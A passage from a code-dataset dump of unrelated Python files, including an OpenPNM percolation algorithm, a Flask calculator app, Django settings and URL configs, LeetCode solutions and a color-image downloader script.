invaded pores\r\n logger.info('Applying capillary pressure: ' + str(inv_val))\r\n self._do_one_inner_iteration(inv_val)\r\n\r\n # Find invasion sequence values (to correspond with IP algorithm)\r\n self['pore.inv_seq'] = sp.searchsorted(sp.unique(self['pore.inv_Pc']),\r\n self['pore.inv_Pc'])\r\n self['throat.inv_seq'] = sp.searchsorted(sp.unique(self['throat.inv_Pc']),\r\n self['throat.inv_Pc'])\r\n\r\n if self._trapping:\r\n self.evaluate_trapping(self['pore.outlets'])\r\n\r\n def _do_one_inner_iteration(self, inv_val):\r\n r\"\"\"\r\n Determine which throats are invaded at a given applied capillary\r\n pressure.\r\n\r\n \"\"\"\r\n # Generate a tlist containing boolean values for throat state\r\n Tinvaded = self['throat.entry_pressure'] <= inv_val\r\n # Find all pores that can be invaded at specified pressure\r\n [pclusters, tclusters] = self._net.find_clusters2(mask=Tinvaded,\r\n t_labels=True)\r\n if self._AL:\r\n # Identify clusters connected to invasion sites\r\n inv_clusters = sp.unique(pclusters[self['pore.inlets']])\r\n else:\r\n # All clusters are invasion sites\r\n inv_clusters = pclusters\r\n inv_clusters = inv_clusters[inv_clusters >= 0]\r\n # Find pores on the invading clusters\r\n pmask = np.in1d(pclusters, inv_clusters)\r\n # Store current applied pressure in newly invaded pores\r\n pinds = (self['pore.inv_Pc'] == sp.inf) * (pmask)\r\n self['pore.inv_Pc'][pinds] = inv_val\r\n # Find throats on the invading clusters\r\n tmask = np.in1d(tclusters, inv_clusters)\r\n # Store current applied pressure in newly invaded throats\r\n tinds = (self['throat.inv_Pc'] == sp.inf) * (tmask)\r\n self['throat.inv_Pc'][tinds] = inv_val\r\n # Store total network saturation\r\n tsat = sp.sum(self._net['throat.volume'][self['throat.inv_Pc'] <= inv_val])\r\n psat = sp.sum(self._net['pore.volume'][self['pore.inv_Pc'] <= inv_val])\r\n total = sp.sum(self._net['throat.volume']) + sp.sum(self._net['pore.volume'])\r\n self['pore.inv_sat'][pinds] = (tsat + psat)/total\r\n self['throat.inv_sat'][tinds] = (tsat + psat)/total\r\n\r\n def evaluate_trapping(self, p_outlets):\r\n r\"\"\"\r\n Finds trapped pores and throats after a full ordinary\r\n percolation simulation has been run.\r\n\r\n Parameters\r\n ----------\r\n p_outlets : array_like\r\n A list of pores that define the wetting phase outlets.\r\n Disconnection from these outlets results in trapping.\r\n\r\n Returns\r\n -------\r\n It creates arrays called ``pore.trapped`` and ``throat.trapped``, but\r\n also adjusts the ``pore.inv_Pc`` and ``throat.inv_Pc`` arrays to set\r\n trapped locations to have infinite invasion pressure.\r\n\r\n \"\"\"\r\n self['pore.trapped'] = sp.zeros([self.Np, ], dtype=float)\r\n self['throat.trapped'] = sp.zeros([self.Nt, ], dtype=float)\r\n try:\r\n # Get points used in OP\r\n inv_points = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Orindary percolation has not been run!')\r\n tind = self._net.throats()\r\n conns = self._net.find_connected_pores(tind)\r\n for inv_val in inv_points[0:-1]:\r\n # Find clusters of defender pores\r\n Pinvaded = self['pore.inv_Pc'] <= inv_val\r\n Cstate = sp.sum(Pinvaded[conns], axis=1)\r\n Tinvaded = self['throat.inv_Pc'] <= inv_val\r\n # 0 = all open, 1=1 pore filled,\r\n # 2=2 pores filled 3=2 pores + 1 throat filled\r\n Cstate = Cstate + Tinvaded\r\n clusters = self._net.find_clusters(Cstate == 0)\r\n # Clean up clusters (invaded = -1, defended >=0)\r\n clusters = clusters * (~Pinvaded) - (Pinvaded)\r\n # Identify clusters connected to outlet sites\r\n out_clusters = sp.unique(clusters[p_outlets])\r\n trapped_pores = ~sp.in1d(clusters, out_clusters)\r\n trapped_pores[Pinvaded] = False\r\n if sum(trapped_pores) > 0:\r\n inds = (self['pore.trapped'] == 0) * trapped_pores\r\n self['pore.trapped'][inds] = inv_val\r\n trapped_throats = self._net.find_neighbor_throats(trapped_pores)\r\n trapped_throat_array = np.asarray([False] * len(Cstate))\r\n trapped_throat_array[trapped_throats] = True\r\n inds = (self['throat.trapped'] == 0) * trapped_throat_array\r\n self['throat.trapped'][inds] = inv_val\r\n inds = (self['throat.trapped'] == 0) * (Cstate == 2)\r\n self['throat.trapped'][inds] = inv_val\r\n self['pore.trapped'][self['pore.trapped'] > 0] = sp.inf\r\n self['throat.trapped'][self['throat.trapped'] > 0] = sp.inf\r\n self['pore.inv_Pc'][self['pore.trapped'] > 0] = sp.inf\r\n self['throat.inv_Pc'][self['throat.trapped'] > 0] = sp.inf\r\n\r\n def evaluate_late_pore_filling(self, Pc, Swp_init=0.75, eta=3.0,\r\n wetting_phase=False):\r\n r\"\"\"\r\n Compute the volume fraction of the phase in each pore given an initial\r\n wetting phase fraction (Swp_init) and a growth exponent (eta)\r\n returns the fraction of the pore volume occupied by wetting or\r\n non-wetting phase.\r\n Assumes Non-wetting phase displaces wetting phase\r\n \"\"\"\r\n Swp = Swp_init*(self['pore.inv_Pc']/Pc)**eta\r\n Swp[self['pore.inv_Pc'] > Pc] = 1.0\r\n Snwp = 1-Swp\r\n if wetting_phase:\r\n return Swp\r\n else:\r\n return Snwp\r\n\r\n def return_results(self, Pc=0, seq=None, sat=None, occupancy='occupancy'):\r\n r\"\"\"\r\n Updates the occupancy status of invading and defending phases\r\n as determined by the OP algorithm\r\n\r\n \"\"\"\r\n p_inv = self['pore.inv_Pc']\r\n self._inv_phase['pore.inv_Pc'] = p_inv\r\n t_inv = self['throat.inv_Pc']\r\n self._inv_phase['throat.inv_Pc'] = t_inv\r\n # Apply invasion sequence values (to correspond with IP algorithm)\r\n p_seq = self['pore.inv_seq']\r\n self._inv_phase['pore.inv_seq'] = p_seq\r\n t_seq = self['throat.inv_seq']\r\n self._inv_phase['throat.inv_seq'] = t_seq\r\n # Apply saturation to pores and throats\r\n self._inv_phase['pore.inv_sat'] = self['pore.inv_sat']\r\n self._inv_phase['throat.inv_sat'] = self['throat.inv_sat']\r\n\r\n if sat is not None:\r\n p_inv = self['pore.inv_sat'] <= sat\r\n t_inv = self['throat.inv_sat'] <= sat\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n elif seq is not None:\r\n p_seq = self['pore.inv_seq'] <= seq\r\n t_seq = self['throat.inv_seq'] <= seq\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_seq, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_seq, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_seq, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_seq, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n else:\r\n p_inv = self['pore.inv_Pc'] <= Pc\r\n t_inv = self['throat.inv_Pc'] <= Pc\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n\r\n def plot_drainage_curve(self, pore_volume='volume', throat_volume='volume',\r\n pore_label='all', throat_label='all'):\r\n r\"\"\"\r\n Plot drainage capillary pressure curve\r\n \"\"\"\r\n try:\r\n PcPoints = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Cannot print drainage curve: ordinary percolation \\\r\n simulation has not been run')\r\n pores = self._net.pores(labels=pore_label)\r\n throats = self._net.throats(labels=throat_label)\r\n Snwp_t = sp.zeros_like(PcPoints)\r\n Snwp_p = sp.zeros_like(PcPoints)\r\n Snwp_all = sp.zeros_like(PcPoints)\r\n Pvol = self._net['pore.' + pore_volume]\r\n Tvol = self._net['throat.' + throat_volume]\r\n Pvol_tot = sp.sum(Pvol)\r\n Tvol_tot = sp.sum(Tvol)\r\n vol_tot = Pvol_tot + Tvol_tot\r\n for i in range(0, sp.size(PcPoints)):\r\n Pc = PcPoints[i]\r\n Snwp_p[i] = sp.sum(Pvol[self['pore.inv_Pc'][pores] <= Pc]) / vol_tot\r\n Snwp_t[i] = sp.sum(Tvol[self['throat.inv_Pc'][throats] <= Pc]) / vol_tot\r\n Snwp_all[i] = (sp.sum(Tvol[self['throat.inv_Pc'][throats] <= Pc]) +\r\n sp.sum(Pvol[self['pore.inv_Pc'][pores] <= Pc])) / vol_tot\r\n if sp.mean(self._inv_phase['pore.contact_angle']) < 90:\r\n Snwp_p = 1 - Snwp_p\r\n Snwp_t = 1 - Snwp_t\r\n Snwp_all = 1 - Snwp_all\r\n PcPoints *= -1\r\n fig = plt.figure()\r\n plt.plot(PcPoints, Snwp_all, 'g.-')\r\n plt.plot(PcPoints, Snwp_p, 'r.-')\r\n plt.plot(PcPoints, Snwp_t, 'b.-')\r\n r\"\"\"\r\n TODO: Add legend to distinguish the pore and throat curves\r\n \"\"\"\r\n return fig\r\n\r\n def plot_primary_drainage_curve(self, pore_volume='volume',\r\n throat_volume='volume', pore_label='all',\r\n throat_label='all'):\r\n r\"\"\"\r\n Plot the primary drainage curve as the capillary pressure on ordinate\r\n and total saturation of the wetting phase on the abscissa.\r\n This is the preffered style in the petroleum engineering\r\n \"\"\"\r\n try:\r\n PcPoints = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Cannot print drainage curve: ordinary percolation \\\r\n simulation has not been run')\r\n pores = self._net.pores(labels=pore_label)\r\n throats = self._net.throats(labels=throat_label)\r\n p_inv = self['pore.inv_Pc']\r\n t_inv = self['throat.inv_Pc']\r\n Snwp_t = sp.zeros_like(PcPoints)\r\n Snwp_p = sp.zeros_like(PcPoints)\r\n Snwp_all = sp.zeros_like(PcPoints)\r\n Swp_all = sp.zeros_like(PcPoints)\r\n Pvol = self._net['pore.' + pore_volume]\r\n Tvol = self._net['throat.' + throat_volume]\r\n Pvol_tot = sp.sum(Pvol)\r\n Tvol_tot = sp.sum(Tvol)\r\n for i in range(0, sp.size(PcPoints)):\r\n Pc = PcPoints[i]\r\n Snwp_p[i] = sp.sum(Pvol[p_inv[pores] <= Pc]) / Pvol_tot\r\n Snwp_t[i] = sp.sum(Tvol[t_inv[throats] <= Pc]) / Tvol_tot\r\n Snwp_all[i] = (sp.sum(Tvol[t_inv[throats] <= Pc]) +\r\n sp.sum(Pvol[p_inv[pores] <= Pc])) / \\\r\n (Tvol_tot + Pvol_tot)\r\n Swp_all[i] = 1 - Snwp_all[i]\r\n fig = plt.figure()\r\n plt.plot(Swp_all, PcPoints, 'k.-')\r\n plt.xlim(xmin=0)\r\n plt.xlabel('Saturation of wetting phase')\r\n plt.ylabel('Capillary Pressure [Pa]')\r\n plt.title('Primay Drainage Curve')\r\n plt.grid(True)\r\n return fig\r\n","sub_path":"OpenPNM/Algorithms/__OrdinaryPercolation__.py","file_name":"__OrdinaryPercolation__.py","file_ext":"py","file_size_in_byte":18468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"460611267","text":"\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom flask import Flask, redirect, url_for, request, render_template,make_response\nfrom calculator.main import test\nimport subprocess\nfrom functools import wraps, update_wrapper\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config[\"CACHE_TYPE\"] = \"null\"\n\ndef cleanLine(line):\n result_dict = {}\n result = line.replace(' ', '')\n result = result.split(',')\n for element in result:\n symbol, value = element.split('=')\n result_dict[symbol] = float(value)\n return result_dict\n@app.route('/input', methods = ['POST', 'GET'])\ndef calcExpr():\n if request.method == 'POST':\n expr = request.form['Expression']\n expr_range = request.form['Range']\n derivative_points = request.form['Point']\n calculation = request.form['Calculation']\n \n if expr_range == '': expr_range = '-1,1'\n if derivative_points == '': derivative_points = 'x=1,y=1'\n if calculation =='': calculation = 'x=1,y=1'\n \n derivative_points = cleanLine(derivative_points)\n calculation = cleanLine(calculation)\n expr_range = list(map(float,expr_range.split(',')))\n pics, canonicalization, partial_derivatives, domain, derivative_point, calculation_result = test(expr,expr_range,derivative_points,calculation)\n return render_template('image.html',\n pics = pics,\n canonicalization = canonicalization,\n input = expr,\n result = calculation_result,\n partial_derivatives = partial_derivatives,\n domain = domain,\n derivative_point = derivative_point)\n\n\n@app.route(\"/\")\ndef main():\n return render_template('index.html')\nif __name__ == '__main__':\n app.run(debug = True)\n #app.run()\n\n\n","sub_path":"app/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"348818843","text":"import raven\n\nfrom .base import *\n\n\nDEBUG = os.environ.get('DEBUG', False)\nCURRENT_HOST = os.environ.get('CURRENT_HOST', '')\nALLOWED_HOSTS = [CURRENT_HOST]\n\nREDIS_HOST = os.environ.get('REDIS_HOST', '127.0.0.1')\nREDIS_PATH = f'redis://{REDIS_HOST}:{REDIS_PORT}/1'\nCELERY_BROKER_URL = REDIS_PATH\nCELERY_RESULT_BACKEND = REDIS_PATH\n\nCACHES['default']['LOCATION'] = [REDIS_PATH, ]\n\n","sub_path":"config/settings/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"551448524","text":"import copy\nimport itertools\n\ndef connect(a, b, l):\n if a[-l:] == b[:l]:\n return a + b[l:], a[-l:]\n elif b[-l:] == a[:l]:\n return b + a[l:], b[-l:]\n else:\n return '',''\n\ndef assemble(edges, nodes, want):\n #while len(nodes) > want and len(edges) > 0:\n while len(nodes) > want:\n for i,j in itertools.combinations(nodes,2):\n contig, overlap = connect(i,j,2)\n if overlap:\n nodes.remove(i)\n nodes.remove(j)\n edges.remove(overlap)\n nodes.append(contig)\n print('[contig]:',contig)\n break\n print('[nodes ]:', nodes)\n return\n\ndef main():\n di = [['Ala','Leu'],['Arg','Gly'],['Asp','Glu'],['Cys','Gly'],\n ['Cys','Gly'],['Glu','Ala'],['Glu','Arg'],['Glu','His'],\n ['Gly','Glu'],['Gly','Phe'],['His','Leu'],['His','Leu'],\n ['Leu','Cys'],['Leu','Val'],['Leu','Val'],['Lys','Ala'],\n ['Phe','Val'],['Ser','His'],['Thr','Pro'],['Tyr','Leu'],\n ['Val','Asp'],['Val','Cys'],['Val','Glu']]\n\n tri = [['Glu','Arg','Gly'],['Glu','His','Leu'],['Gly','Glu','Arg'],\n ['His','Leu','Cys'],['Leu','Cys','Gly'],['Leu','Val','Cys'],\n ['Leu','Val','Glu'],['Phe','Val','Asp'],['Pro','Lys','Ala'],\n ['Ser','His','Leu'],['Tyr','Leu','Val'],['Val','Asp','Glu'],\n ['Val','Cys','Gly'],['Val','Glu','Ala']]\n\n assemble(['bc','cd'],['abc', 'bcd', 'cde'], 1)\n assemble(['cd','bc'],['bcd', 'abc', 'cde'], 1)\n assemble(['cd','bc','ij','jk'],['bcd', 'abc', 'cde','hij','ijk','jkl'], 2)\n #assemble(di, tri, 2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"assemble_insulin.py","file_name":"assemble_insulin.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"296925077","text":"#! python3\nfrom array import array\n\n__author__ = 'Lucas'\n\nbase_set = {1, 2, 3, 4, 5}\nprint(base_set)\nbase_set = {5, 4, 3, 2, 1}\nprint(base_set)\n\nmy_list = ['Lucas', 'Nirvana', 'Kate', 'Jorge'] * 3\nprint(my_list)\nmy_set = set(my_list)\nprint(my_set)\n","sub_path":"S1/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"361930833","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\n__all__ = ['create_design_matrix',\n ]\n\nday_sec = 24*3600\nyr_sec = 365.25*24*3600\n\ndef create_design_matrix(toas, RADEC=False, PROPER=False, PX=False):\n \"\"\"\n Return designmatrix for quadratic spindown model + optional\n astrometric parameters\n\n Parameters\n ----------\n toas : array\n TOA measurements [s]\n\n RADEC : bool, optional\n Includes RA/DEC fitting.\n\n PROPER : bool, optional\n Includes proper motion fitting.\n\n PX : bool, optional\n Includes parallax fitting.\n\n Returns\n -------\n M : array\n Design matrix for quadratic spin down + optional astrometry fit.\n\n \"\"\"\n model = ['QSD', 'QSD', 'QSD']\n if RADEC:\n model.append('RA')\n model.append('DEC')\n if PROPER:\n model.append('PRA')\n model.append('PDEC')\n if PX:\n model.append('PX')\n\n ndim = len(model)\n designmatrix = np.zeros((len(toas), ndim))\n\n for ii in range(ndim):\n if model[ii] == 'QSD': #quadratic spin down fit\n designmatrix[:,ii] = toas**(ii) #Cute\n if model[ii] == 'RA':\n designmatrix[:,ii] = np.sin(2*np.pi/yr_sec*toas)\n if model[ii] == 'DEC':\n designmatrix[:,ii] = np.cos(2*np.pi/yr_sec*toas)\n if model[ii] == 'PRA':\n designmatrix[:,ii] = toas*np.sin(2*np.pi/yr_sec*toas)\n if model[ii] == 'PDEC':\n designmatrix[:,ii] = toas*np.cos(2*np.pi/yr_sec*toas)\n if model[ii] == 'PX':\n designmatrix[:,ii] = np.cos(4*np.pi/yr_sec*toas)\n\n return designmatrix\n","sub_path":"hasasia/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"43933143","text":"# Relevant javadocs\n# LayoutPolicy, VersionPolicy\n# http://search.maven.org/remotecontent?filepath=org/sonatype/nexus/plugins/nexus-repository-maven/3.12.1-01/nexus-repository-maven-3.12.1-01-javadoc.jar\n# WritePolicy\n# http://search.maven.org/remotecontent?filepath=org/sonatype/nexus/nexus-repository/3.0.2-02/nexus-repository-3.0.2-02-javadoc.jar\n\nPOLICY_IMPORTS = {\n 'layout': ['org.sonatype.nexus.repository.maven.LayoutPolicy'],\n 'version': ['org.sonatype.nexus.repository.maven.VersionPolicy'],\n 'write': ['org.sonatype.nexus.repository.storage.WritePolicy'],\n}\n\nPOLICIES = {\n 'layout': {\n 'permissive': 'LayoutPolicy.PERMISSIVE',\n 'strict': 'LayoutPolicy.STRICT',\n },\n 'version': {\n 'release': 'VersionPolicy.RELEASE',\n 'snapshot': 'VersionPolicy.SNAPSHOT',\n 'mixed': 'VersionPolicy.MIXED',\n },\n 'write': {\n 'allow': 'WritePolicy.ALLOW',\n 'allow_once': 'WritePolicy.ALLOW_ONCE',\n 'deny': 'WritePolicy.DENY',\n },\n}\n","sub_path":"src/nexuscli/nexus_repository.py","file_name":"nexus_repository.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"451717460","text":"\"\"\"\n@link:\n\n [225. Implement Stack using Queues](https://leetcode.com/problems/implement-stack-using-queues/)\n\n@desc:\n\n Implement the following operations of a stack using queues.\n\n push(x) -- Push element x onto stack.\n pop() -- Removes the element on top of the stack.\n top() -- Get the top element.\n empty() -- Return whether the stack is empty.\n Notes:\n You must use only standard operations of a queue -- which means only push to back, peek/pop from front, size, and is empty operations are valid.\n Depending on your language, queue may not be supported natively. You may simulate a queue by using a list or deque (double-ended queue), as long as you use only standard operations of a queue.\n You may assume that all operations are valid (for example, no pop or top operations will be called on an empty stack).\n\n\"\"\"\n\n\nclass StackByTwoQueues(object):\n def __init__(self):\n \"\"\"\n use two queues to implement stack\n operations of queue as a list:\n - push: append(x)\n - pop: pop(0)\n - peek: [0]\n - size: len()\n - empty: not\n @Runtime: 40 ms\n @Reference: https://leetcode.com/discuss/46975/a-simple-c-solution\n initialize your data structure here.\n \"\"\"\n self.queue1, self.queue2 = [], []\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: nothing\n \"\"\"\n if self.queue1:\n self.queue1.append(x)\n else:\n self.queue2.append(x)\n\n def pop(self):\n \"\"\"\n :rtype: nothing\n \"\"\"\n if self.queue1:\n while len(self.queue1) > 1:\n self.queue2.append(self.queue1.pop(0))\n return self.queue1.pop(0)\n else:\n while len(self.queue2) > 1:\n self.queue1.append(self.queue2.pop(0))\n return self.queue2.pop(0)\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n x = None\n if self.queue1:\n while len(self.queue1) > 1:\n self.queue2.append(self.queue1.pop(0))\n x = self.queue1.pop(0)\n self.queue2.append(x)\n else:\n while len(self.queue2) > 1:\n self.queue1.append(self.queue2.pop(0))\n x = self.queue2.pop(0)\n self.queue1.append(x)\n return x\n\n def empty(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n return (not self.queue1) and (not self.queue2)\n\n\nclass StackByOneQueue(object):\n def __init__(self):\n \"\"\"\n use one queue to implement stack\n operations of queue as a list:\n - push: append(x)\n - pop: pop(0)\n - peek: [0]\n - size: len()\n - empty: not\n @Runtime: 40 ms\n initialize your data structure here.\n \"\"\"\n self.queue = []\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: nothing\n \"\"\"\n self.queue.append(x)\n queue_size = len(self.queue)\n i = 0\n while i < queue_size - 1:\n self.queue.append(self.queue.pop(0))\n i += 1\n\n def pop(self):\n \"\"\"\n :rtype: nothing\n \"\"\"\n return self.queue.pop(0)\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.queue[0]\n\n def empty(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n return not self.queue\n\nif __name__ == '__main__':\n # stack = StackByTwoQueues()\n stack = StackByOneQueue()\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n\n assert stack.pop() == 5\n assert stack.top() == 4\n stack.push(6)\n stack.push(7)\n assert stack.top() == 7\n assert stack.pop() == 7\n assert stack.empty() == False\n","sub_path":"leetcode/leetcode_e_225.py","file_name":"leetcode_e_225.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"620342770","text":"\"\"\"ebdjango URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom api.resources import *\n\nticket_resource = TicketResource()\nproject_resource = LdrprojectResource()\n\n#Admin Configuration\nadmin.site.site_header = settings.ADMIN_SITE_HEADER\n\n#original pattern\n#urlpatterns = [\n# url(r'^admin/', admin.site.urls),\n# url(r'^', include('helloworld.urls')), \n#] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('portal.urls')),\n url(r'^up/', include('userapp.urls')),\n url(r'^accounts/', include('registration.backends.default.urls')),\n url(r'^helpdesk/', include('helpdesk.urls', namespace='helpdesk')),\n url(r'^project/', include('project.urls', namespace='project')),\n url(r'^api/', include(ticket_resource.urls)),\n url(r'^api/', include(project_resource.urls)),\n \n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"ebdjango/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"469909844","text":"from __future__ import print_function\nfrom stylelens_dataset.colors import Colors \nfrom pprint import pprint\nimport os\nimport string\nimport time\nimport tensorflow as tf\nimport urllib.request as urllib\n# import redis\n# from bluelens_log import Logging\n\napi_instance = Colors()\n\nflags = tf.app.flags\nflags.DEFINE_string('color_dataset_path', '', 'Path to color_dataset_path')\nFLAGS = flags.FLAGS\n\n'''\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='generate-color-classifier-dataset')\nrconn = redis.StrictRedis(REDIS_SERVER, decode_responses=True, port=6379, password=REDIS_PASSWORD)\n'''\n\ndef get_colors(classes):\n color_dataset_path = FLAGS.color_dataset_path\n \n try:\n for clazz in classes:\n color_name = clazz\n\n \n os.chdir(color_dataset_path)\n try:\n os.mkdir(color_name)\n except FileExistsError:\n pass\n os.chdir(color_name) \n\n pprint('get_colors API... color : ' + color_name)\n \n offset = 0\n limit = 100\n i = 0\n while True:\n \n colors = api_instance.get_colors_by_name(color_name, offset=offset,\n limit=limit)\n\n for color in colors:\n _id = str(color['_id'])\n download_image_from_url(color['main_image'], _id + '.jpg')\n # pprint(color_object_list)\n\n if limit > len(colors):\n break\n else:\n offset += limit\n i += 1\n pprint('get_colors API... color : ' + color_name + ' / ' + str(i))\n\n pprint('get_colors API... color : ' + color_name + ' ALL Done !')\n\n except Exception as e:\n print(\"Exception when calling get_colors_by_name: %s\\n\" % e)\n\ndef get_color_classes():\n try:\n classes = api_instance.get_classes()\n return classes\n except Exception as e:\n print(\"Exception when calling get_color_classes: %s\\n\" % e)\n return None\n\ndef download_image_from_url(url, filename):\n try:\n urllib.urlretrieve(url, filename)\n except urllib.HTTPError:\n pass\n\n\ndef main(_):\n # log.info('Start generate-color-classifier-dataset')\n #classes = get_color_classes()\n color_list = ['Black', 'Gray', 'Purple', 'Blue', 'Brown','Green', 'Orange', 'Red', 'Pink', 'Yellow','White', 'Navy', 'Beige'] \n classes = color_list\n #if classes:\n get_colors(classes)\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"stylelens/dataset/deepfashion/attr_model/get_object_by_color.py","file_name":"get_object_by_color.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"589328924","text":"\"\"\"\nLeetCode #14\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\nNote:\n\nAll given inputs are in lowercase letters a-z.\n\"\"\"\n\n\ndef longestCommonPrefix(strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return \"\"\n elif len(strs) == 1:\n return strs[0]\n longest_prefix = strs[0]\n for i in range(1, len(strs)):\n curr_prefix = \"\"\n curr_string = strs[i]\n for j in range(0, len(longest_prefix)):\n if j >= len(curr_string) or curr_string[j] != longest_prefix[j]:\n break\n else:\n curr_prefix += curr_string[j]\n if curr_prefix == \"\":\n return \"\"\n if len(curr_prefix) <= len(longest_prefix):\n longest_prefix = curr_prefix\n return longest_prefix\n\n","sub_path":"leetcode/LongestCommonPrefix.py","file_name":"LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"385483295","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/linkexchange_django/tests.py\n# Compiled at: 2011-05-12 16:14:22\nimport unittest\nfrom linkexchange.tests import MultiHashDriverTestMixin\nfrom linkexchange_django.models import DBHash\nfrom linkexchange_django.db_drivers import DjangoMultiHashDriver\n\nclass DBHashTest(unittest.TestCase):\n\n def setUp(self):\n self.hash = DBHash.objects.create(dbname='testdb', key='testkey')\n self.hash.save()\n\n def tearDown(self):\n self.hash.items.all().delete()\n self.hash.delete()\n\n def test_clear_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2')])\n self.hash.save()\n self.assertEqual(len(self.hash), 2)\n self.hash.clear_items()\n self.hash.save()\n self.assertEqual(len(self.hash), 0)\n\n def test_update_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 